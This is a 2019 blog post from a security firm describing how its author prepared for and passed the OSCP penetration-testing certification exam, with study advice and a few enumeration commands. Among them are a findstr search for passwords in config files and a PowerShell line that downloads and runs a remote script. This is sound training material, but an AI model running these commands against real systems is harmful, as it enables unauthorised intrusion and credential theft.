
By Jonathan Armas | December 04, 2019
Before taking the exam
I already had years of work work experience as a penetration tester
at Fluid Attacks
.
So, I already had the knew how to perform a penetration test
and how to build a technical report of my findings.
However, if you don’t have any work experience on the field
or you’re just starting out,
this post may help you pass your exam.
The most important phase on a penetration test is scanning.
Here you will use tools to get information about your target,
such as its operating system, open ports, the services running on those ports
and their versions, whether they have public vulnerabilities or not,
and whether there is a public exploit for those vulnerabilities.
Since metasploit
is restricted to only ONE machine
(this includes the auxiliary modules too)
you need to be familiar with tools such as:
The only way to do this is by using them continuously until you develop a solid enumeration strategy. To help with this there are services like hackthebox and vulnhub, where you can find vulnerable machines on which to test your skills.
Once there you can also practice the gaining access phase
and your privilege escalation strategies with multiple operating systems
and vulnerabilities that resemble the ones in real-life scenarios.
You would be surprised by how many times
I’ve encountered a vulnerability on hackthebox
first
and then on a real-life service.
The tools and resources that I got the most from for privilege escalation were:
I recommend hacking all the live machines that you can without any help and get some points on the platform. Doing this helps you get used to the tools and increases your confidence in using them when you take the exam. If you can’t hack a machine and it gets removed, you can check the walkthrough by Ippsec and learn new things. You can learn stuff from these videos even for machines you did root. Do this for at least one month or, if you have no work experience whatsoever, two months.
I had a month of lab access, so the approach I took to the course and the lab was to split them by days One concentrating on the guide and taking notes of things that I didn’t know, and another day for attacking the lab machines.
When you are working on the machines, also work on your time management skills. Do not spend too much time on one machine when you can try another one. Time management becomes very important when you are taking your exam.
Before your lab access ends,
be sure that you fully understand how to do a buffer overflow
.
Take notes of every step, copy all the commands that you need,
and also how to get the return address
.
Here you want to gather the most information
about the last two steps.
We are going back to hackthebox
but instead of doing the active machines
we are going to do the ones from this list
(there are also some from vulnhub
).
Try to conquer those machines listed without the aid of walkthroughs. When you finish one, look at these walkthroughs to check whether there is another way in, if so then also practice it.
The day before the exam, I did nothing. Your body and mind need to rest and you should not try to cram before the test. Eat your favourite foods whatever they may be. Treat yourself to a well-deserved dessert, watch movies, and series that you perhaps ignored when you focused on your studies. The point is to de-stress so you’re fresh when you take the exam.
The task is to gain administrative access
to the machines in the network.
There are 5 machines,
each is worth a certain number of points if you complete it
and you need at least 70
points to pass the exam.
The machine points are distributed as:
25 points Buffer Overflow
25 points machine
Two 20 points machines
10 points machine
I started with the 25 points BoF
machine
while I scanned all the other ones.
I did this because I knew that I could follow the guide step-by-step
and get the BoF points.
My scanning strategy was to run nmap
with these options:
$ nmap ip.ip.ip.ip -A -p- --min-rate=5000 --max-retries=5 -o tcp.txt
Also, I pinged the machine
in order to view its operative system.
If the TTL
(Time to Live) is 64
then it is a Linux
machine
and if it is 128
then it’s a Windows
machine.
When the port scan finished I checked every web service
and used a web crawler like dirbuster
or dirsearch
.
After finishing the BoF
machine,
I started hacking the machines
with all the information that I had collected.
I ended up going down rabbit holes
trying to gain admin privileges on the 25-pointer machine.
Because of the time the 25-point machine was taking,
I quickly decided to switch to both the 20-point
and finally, the 10-pointer machine.
For privilege escalation I first checked the operative system version and kernel, this can be done by running:
$ uname -a #linux
> systeminfo #windows
If it was Linux
I checked for sudo
rights
running processes, and for SUID
executables.
There is a tool named linenum
but it’s too verbose
and I like to search for things manually.
$ sudo -l
$ ps -aux
$ find / -perm -u=s -type f 2>/dev/null
If it was Windows
, I checked for the Groups.xml
file
(usually it has administrative user and password information there),
installed software and tried to use powershell
to run Windows
exploits.
When it comes to Windows
, most of the time the way of escalating privileges
is through a vulnerability in the OS
version
or in an installed program version.
> findstr /si password *.xml *.ini *.txt *.config 2>nul
> IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
I finished my test in less than 10 hours
with 4 admins and 1 user for a little more than 75
total points.
The mistake that I made
was to be lazy with my screenshots,
so I needed to redo all the machines
to get all of my evidences. DO NOT DO THIS!
The next day I did my technical documentation,
the advice here is to put everything that you did
from the scanning phase up to the privilege escalation phase.
Also, if you modified an exploit (even if is only one line)
put it on the report and mark what you modified.
The OSCP is a difficult certification, but it’s not impossible. The steps before the lab are going to help you get the most out of the course and to establish your own routine when it comes to doing a penetration test. The enumeration and scanning phases are the most important ones in the whole process because you can spend hours going down rabbit holes if you do not do these steps properly. Mental toughness is needed to pass this test, so be prepared to think quickly and creatively, daisy-chaining vulnerabilities, and rest when you need it. The discord groups of hackthebox and OFFSEC are at your disposal to answer your questions or give you hints where you need them. Try harder.
Corporate member of The OWASP Foundation
Copyright © 2021 Fluid Attacks, We hack your software. All rights reserved.